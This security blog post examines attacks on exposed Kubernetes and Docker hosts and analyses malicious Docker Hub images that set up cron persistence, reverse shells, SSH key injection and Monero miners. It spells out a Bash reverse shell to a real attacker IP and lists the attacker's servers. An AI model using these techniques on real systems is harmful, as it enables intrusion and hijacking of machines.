We noticed an increase in hacker interest in publicly accessible orchestration platforms such as Kubernetes — a container orchestration tool that automates the deployment, update, and monitoring of containers.

At the start of 2018, research by Sysdig showed that attackers moved on from EC2 exploits to container-specific and kubernetes-specific exploits.  A preconfigured Kubernetes instance located on honeypot servers was poisoned with malicious Docker containers that would mine Monero.

Cryptojaking has become a real-life issue, targeting a diverse array of victims, from individual consumers to large manufacturers.  In February 2018, Checkpoint researchers found one of the biggest malicious mining operations ever discovered. Cybercriminals exploited the known CVE-2017-1000353 vulnerability in the Jenkins Java deserialization implementation. Since Jenkins has been called the most widely deployed automation server with an estimated 1 million users, the attack resulted in way more serious consequences. During malicious mining operation, the hackers have accumulated 10,800 Monero, which is currently worth $3,436,776.

Around the same time, in February 2018, RedLock researchers discovered hundreds of Kubernetes administration consoles accessible over the internet without any password protection, including servers belonging to Tesla. The hackers had infiltrated Tesla’s Kubernetes console, which was not password protected. Within one Kubernetes pod, access credentials were exposed to Tesla’s AWS environment, which contained an Amazon S3 (Amazon Simple Storage Service) bucket that had sensitive data such as telemetry. In addition to the data exposure, hackers were performing crypto mining from within one of Tesla’s Kubernetes pods.

The Tesla incident is just the first of many container technology-based exploits we will see in the coming months and years.

What are containers, Docker and Kubernetes?

Containers are a way of packaging software. You can think of running a container like running a virtual machine, without the overhead of spinning up an entire operating system.

Docker helps you create and deploy software within containers. With Docker, you create a special file called a Dockerfile. Dockerfiles define a build process, which, when fed to the ‘docker build’ command, will produce an immutable docker image. You can think of this as a snapshot of your application, ready to be brought to life at any time. When you want to start it up, just use the ‘docker run’ command to run it anywhere the docker daemon is supported and running. It can be on your laptop, your production server in the cloud, or on a raspberry pi. Docker also provides a cloud-based repository called Docker Hub. You can think of it like GitHub for Docker Images. You can use Docker Hub to store and distribute the container images you build.

When you need to start the right containers at the right time, figure out how they can talk to each other, handle storage considerations, and deal with failed containers or hardware, that’s where Kubernetes comes in. Kubernetes is an open source container orchestration platform, allowing large numbers of containers to work together in harmony, reducing operational burden. It helps with things like:

  • Running containers across many different machines

  • Scaling up or down by adding or removing containers when demand changes

  • Keeping storage consistent with multiple instances of an application

  • Distributing load between the containers

  • Launching new containers on different machines if something fails

Kubernetes is supported by all major container management and cloud platforms such as Red Hat OpenShift, Docker EE, Rancher, IBM Cloud, AWS EKS, Azure, SUSE CaaS, and Google Cloud.

How cybercriminals behave

Both original attack schemes on Docker engine and Kubernetes instances were explained by Aqua Security and Alexander Urcioli respectively.

In the first case, researchers from Aqua Security simulated a system with an “accidentally” exposed docker daemon. Here is what they discovered two days later:

  • Hundreds of suspicious actions were logged, many of them were created automatically.

  • The attacker attempted to execute a variety of docker commands for image and container management.

  • After successful information gathering about the running Docker version, the attacker used the docker import functionality for image injection.

  • After a successful image injection, the attacker would start mining.

The second case shows how Alexander Urcioli came across an already compromised personal Kubernetes cluster. He realized that due to misconfiguration that resulted in the public exposing of the kubelet ports (TCP 10250, TCP 10255) and unauthenticated API requests, the attacker :

  • Sent two requests: an initial POST and a follow-up GET with exec command to kubelet.

  • Executed a dropper script on a running Docker container through kubelet. Dropper script named “kube.lock” would download the mining software from transfer.sh and execute it.

Recently we found another disturbing issue with misconfigured kubernetes cluster. It turns out that the kubelet exposes an unauthenticated endpoint on port 10250.

Let’s come back Alexander Urcioli research one more time:

There are two ports that kubelet listens in on, 10255 and 10250. The former is a read-only HTTP port and the latter is an HTTPS port that can essentially do whatever you want.

Further inspection showed that Kubernetes PodList leaked AWS Access keys (access key ID and secret access key), which simply provide a root access to AWS environments including an Amazon EC2, RDS, S3, and related actions on them.

When we look through latest kubelet documentation we find debug handlers in charge of running code in any container. The option is enabled by default.

--enable-debugging-handlers     Default: true
Enables server endpoints for log collection and local running of containers and commands

The option left on by default, in conjunction with exposed 10250 port, could have led to devastating consequences.  

We can assume now which steps an average cybercriminal can take to attack container based virtualized environments:

  • Collect targets automatically through Shodan, Censys or Zoomeye.

  • Infiltrate vulnerable or misconfigured Docker registries or Kubernetes instances.

  • Exploit weak default settings and inject mining malware within containers. Usually, this is done by injecting a malicious docker image into the docker host. The popular and conventional way to do this is to push the image to a registry (Docker Hub is the natural place) and pull it from the victim host.

It all also requires C2 servers, how cybercriminals build it:

  • Collect targets automatically through Shodan, Censys or Zoomeye.

  • Automate the exploitation of remote targets using something like AutoSploit.

  • Take full control of compromised targets and place C2 servers there.

Does Docker care?

Why it is feasible to pack mining malware into Docker containers? We decided to poke around Docker images with an eye to security aspects.

In an interview, Ericsson’s Head of Cloud Jason Hoffman stated: “Docker’s taking off because it’s the new package management”. That provides a good explanation of Docker’s rapid adoption, but also hides the fact that Docker images are generally dependent on the package manager provided by an underlying Linux distribution. Images like CentOS 5.11 are deliberately held back for the sake of compatibility and have the Shellshock vulnerability.

From https://medium.com/microscaling-systems/dockerfile-security-tuneup-166f1cdafea1

One of the key differences between containers and virtual machines is that containers share the kernel with the host. By default, docker containers run as root which causes a breakout risk. If your container becomes compromised as root it has root access to the host.

Docker is making Security Scanning available as a free preview for a limited time. From the Docker docs:

Docker Security Scanning

The Docker Security Scanning preview service will end on March 31st, 2018, for private repos (not official repos) in both Docker Cloud and Docker Hub. Until then, scanning in private repos is limited to one scan per day on the “latest” tag.

Relying on blog.docker.com:

Docker Security Scanning went alongside Docker Cloud to trigger a series of events once a new image is pushed to a repository. The service included a scan trigger, the scanner, a database, plugin framework and validation services that connect to CVE databases.

Security Scanning provides a detailed security profile of your Docker images for proactive risk management and to streamline software compliance. Docker Security Scanning conducts binary level scanning of your images before they are deployed, provides a detailed bill of materials (BOM) that lists out all the layers and components, continuously monitors for new vulnerabilities, and provides notifications when new vulnerabilities are found.

From the Docker docs:

Cluster and application management services in Docker Cloud are shutting down on May 21. You must migrate your applications from Docker Cloud to another platform and deregister your Swarms. 

The Docker Cloud runtime is being discontinued. This means that you will no longer be able to manage your nodes, swarm clusters, and the applications that run on them in Docker Cloud. To protect your applications, you must migrate them to another platform, and if applicable, deregister your Swarms from Docker Cloud.

It seems that the Docker ecosystem is becoming more enterprise oriented and the responsibility for safe migration and further secure maintenance falls on ordinary developers.

What went wrong?

Several disturbing incidents that we found on Twitter:

Trojan MiraiDDoS.An embedded in lightweight Unix-like operating system BusyBox stored in DockerHub image has been detected by VirusTotal

Figure 2. Trojan MiraiDDoS.An embedded in lightweight Unix-like operating system BusyBox stored in DockerHub image has been detected by VirusTotal.

Fortunately that docker registry no longer available.

Several tweets inform about embedded cryptocoin miners:

Twitter user found embedded BTC miner in the docker container

Figure 3. Twitter user found embedded BTC miner in the docker container. https://twitter.com/jperras/status/894561761252319232 The image is already banned.

Twitter user complaining that there are no convenient ways to report about malware in images on DockerHub

Figure 4. Twitter user complaining that there are no convenient ways to report about malware in images on DockerHub.

As there is no convenient way to report malicious images on DockerHub, users complain on GitHub

Figure 5. As there is no convenient way to report malicious images on Docker Hub, users complain on GitHub.

What we found

While we were looking through GitHub we came across a complaint that drew our attention:

DockerHub registry docker12321 was accused of storing malicious image

Figure 6. Docker Hub registry docker123321 was accused of storing malicious image

Public repository https://hub.docker.com/r/docker123321/ was created approximately in May 2017 and was suspected of storing 17 malicious images

Figure 7. Public repository https://hub.docker.com/r/docker123321/ was created approximately in May 2017 and was suspected of storing 17 malicious images.

  Name of image

  Creation timestamp

 

  docker123321/tomcat

  2017-07-25 04:53:28   

  1st bunch of malicious images  

  docker123321/tomcat11   

  2017-08-22 08:38:48

  docker123321/tomcat22

  2017-08-22 08:58:35

  docker123321/kk

  2017-10-13 18:56:22

  2nd bunch of malicious images

  docker123321/mysql

  2017-10-24 01:49:42

  docker123321/data

  2017-11-09 01:00:14

  docker123321/mysql0

  2017-12-12 18:32:22

  docker123321/cron

  2018-01-05 11:33:04

  3rd bunch of malicious images

  docker123321/cronm

  2018-01-05 11:33:04

  docker123321/cronnn

  2018-01-12 02:06:11

  docker123321/t1

  2018-01-18 09:54:04

  docker123321/t2

  2018-01-19 09:41:46

  docker123321/mysql2

  2018-02-02 11:40:53

  4th bunch of malicious images

  docker123321/mysql3

  2018-02-02 18:52:00

  docker123321/mysql4

  2018-02-05 14:05:18

  docker123321/mysql5

  2018-02-05 14:05:18

  docker123321/mysql6

  2018-02-07 02:16:29

First three malicious docker images were created in July and August 2017:

  • docker123321/tomcat

  • docker123321/tomcat11

  • docker123321/tomcat22

We inspected the docker image with ‘$ docker inspect docker123321/tomcat’ using CLI:

The output of CLI command

 Figure 8. The output of CLI command

It turns out that the image runs a shell script containing a sequence of commands:

  • mount /etc/ from the host filesystem to /mnt/etc/ inside the container so that it writes to files below /etc on the host.

  • Add new cronjob to /etc/crontab on the host. It allows the attacker to gain persistence on the victim’s system.

  • Cronjob runs at every minute and executes Python Reverse Shell, which gives an attacker an interactive shell on the victim’s machine. Everything that the attacker writes on the Server Side is sent over the socket. Then the victim’s system executes it in a subprocess like a command.

Imagine a situation where an inexperienced user pulls an image like docker123321/tomcat. Even if the user realizes that the image is not what it represents and tries to delete it from his system, the user could very easily already be hacked.

This image is similar to previous malicious shell script because it also:

The output of ‘$ docker inspect docker123321/tomcat11’ CLI command

Figure 9. The output of ‘$ docker inspect docker123321/tomcat11’ CLI command

The difference from the previous example is that this shell script runs Bash Reverse Shell,  which does the following:

  • Makes the victim machine connect to a control server and then forwards the session to it.

  • The command bash -i >& invokes bash with an “interactive” option.

  • Then /dev/tcp/98.142.140.13/3333 redirects that session to a TCP socket via device file. Linux has built a /dev/ device file.

  • This built-in device file lets bash connect directly to any IP and any port out there.tcp

  • Finally 0>&1 Takes standard output, and connects it to standard input.

We realized that when container runs on a victim’s machine, it will give an attacker control of the machine on which remote command execution is to be achieved.   

The output of ‘$ docker inspect docker123321/tomcat22’ CLI command

Figure 10. The output of ‘$ docker inspect docker123321/tomcat22’ CLI command

Here we found a shell script that does following:

  • mounts /root/.ssh/ from the host filesystem to /mnt/root/.ssh/ inside the container so that it writes to files below /root/.ssh/ on the host.

  • Adds SSH key to /root/.ssh/authorized_keys file on the host machine. Its purpose is to provision access without requiring a password for each login.

Once complete, it grants the attacker with full control of the victim’s machine. Making a profit is as easy as injecting ransomware or mining on a compromised system.

October 2017: 2 new malicious images were added:

  • docker123321/kk

  • docker123321/mysql

The output of ‘$ docker inspect docker123321/kk’ CLI command

Figure 11. The output of ‘$ docker inspect docker123321/kk’ CLI command

Inspection showed the following behavior:

  • First, it adds a new crontab entry under host /etc directory.

  • Cronjob runs at every minute and makes system tool curl download test44.sh

test44.sh

Figure 12. test44.sh

The perpetrator’s Monero wallet appears in a bash script -

 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo  

The perpetrator’s Monero wallet

Figure 13. The perpetrator’s Monero wallet

Total Paid is 544.74 XMR, which is equal to 89097.67 USD. There are high odds that the 90k USD were earned by poisoning cloud environments with crypto mining containers.

A similar algorithm was implemented in docker123321/mysql:

The output of ‘$ docker inspect docker123321/mysql’ CLI command

Figure 14. The output of ‘$ docker inspect docker123321/mysql’ CLI command

When the container runs, the following will happen:

  • First, it adds new crontab entry under host /etc directory.

  • Cronjob runs at every minute and makes system tool curl download logo3.jpg which is actually a bash script.

  • The script contains sequence of commands that start mining software on the victim’s machine.

test44.sh and the same malicious logo1.jpg from docker123321/cron were investigated in detail earlier.

Research shows that docker123321 images can be divided into five categories.

  Docker image name

  Type of malware

  docker123321/tomcat  

  docker123321/mysql2

  docker123321/mysql3

  docker123321/mysql4

  docker123321/mysql5

  docker123321/mysql6

  Containers run Python Reverse Shell

 docker123321/tomcat11  

  Containers run Bash Reverse Shell

  docker123321/tomcat22

  Containers add attacker’s SSH key

  docker123321/cron
  docker123321/cronm

  docker123321/cronnn

  docker123321/mysql

  docker123321/mysql0

  docker123321/data

  docker123321/t1

  docker123321/t2

  Containers run embedded cryptocoin miners.

  (On condition that container runs, it will download a malicious .jpg file that runs in bash and exposes mining software.)

  docker123321/kk

  Containers run embedded crypto coin miners.

  (On condition that container runs, it will download a malicious .sh file that runs in bash and exposes mining software.)

Table 1. Python Reverse Shell and embedded cryptocoin miners hold most of the images.

  Docker image name

  IP address used in image

  docker123321/cron

  docker123321/cronm

  162.212.157.244

  docker123321/mysql

  104.225.147.196

  docker123321/mysql0

  128.199.86.57

  docker123321/mysql2

  docker123321/mysql3

  docker123321/mysql4

  docker123321/mysql5

  docker123321/mysql6

  45.77.24.16

  docker123321/data

  142.4.124.50

  docker123321/kk

  198.181.41.97

  docker123321/tomcat

  docker123321/tomcat11

  98.142.140.13

  docker123321/cronnn

  67.231.243.10

  docker123321/t1

  docker123321/t2

  185.82.218.206

Table 2. Attacker used 9 IPs to address his remote servers

A simple lookup (for instance 67.231.243.10)  shows that the IP was used to address malware including:

  • xmrig.exe - open-source cryptocurrency mining utility

  • .jpg files which are obfuscated malicious bash scripts

  • PowerShell scripts

Virustotal IP address information

Figure 15. Virustotal IP address information

When we get the historical view of most used IP’s using Shodan CLI, we see following:

Figure 16. Shodan host information

Figure 17.

Figure 18.

It shows numerous vulnerabilities in network services associated with OpenSSH, Pure-FTPd, ProFTPD, and Apache HTTP Server. There are high odds that the attacker exploited these vulnerabilities in order to turn remote machines into command-and-control servers.

Conclusions

For ordinary users, just pulling a Docker image from the DockerHub is like pulling arbitrary binary data from somewhere, executing it, and hoping for the best without really knowing what’s in it.

The main thing we should consider is traceability. The process of pulling a Docker image has to be transparent and easy to follow. First, you can simply try to look through Dockerfile to find out what the FROM and ENTRYPOINT notations are and what the container does. Second, Docker images are built using the Docker automated builds. That’s because, with Docker automated builds, you get traceability between the source of the Dockerfile, the version of the image, and the actual build output.

Each build´s details show a lot of information that can be used for improved trust in the image:

  • The SHA from the git repository with Dockerfile

  • Every command from the Dockerfile that is executed is shown

  • Finally, it all ends with a digest of the image pushed

Kubernetes deployments are just as vulnerable to attacks and exploits from hackers and insiders as traditional environments. By attacking the orchestration tools, hackers can disrupt running applications and even gain control of the underlying resources used to run containers. Old models and tools for security will not be able to keep up in a constantly changing container environment.  You need to ask yourself whether you’re able to monitor what’s going on inside a pod or container to determine if there is a potential exploit. Pay specific attention to the most damaging “kill chain” attacks — a series of malicious activities which together achieve the attacker’s goal. Detecting events in a kill chain requires multiple layers of security monitoring. The most critical vectors to monitor in order to have the best chances of detection in a production environment are Network inspection, Container monitoring, and Host security.

An internal and external communication within Kubernetes cluster should be considered as most important part of the secure configuration. The key notions we learned:

  • the connection is not secure enough to be run across the internet.kubelet

  • SSH tunnels must be used to securely put packets onto the cluster's network without exposing the kubelet's web server to the internet.

  • The kubelet needs to serve its https endpoint with a certificate that is signed by the cluster CA.

Adherence to these principles can help you gain a certain level of security awareness.

 

Viewing all 25817 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>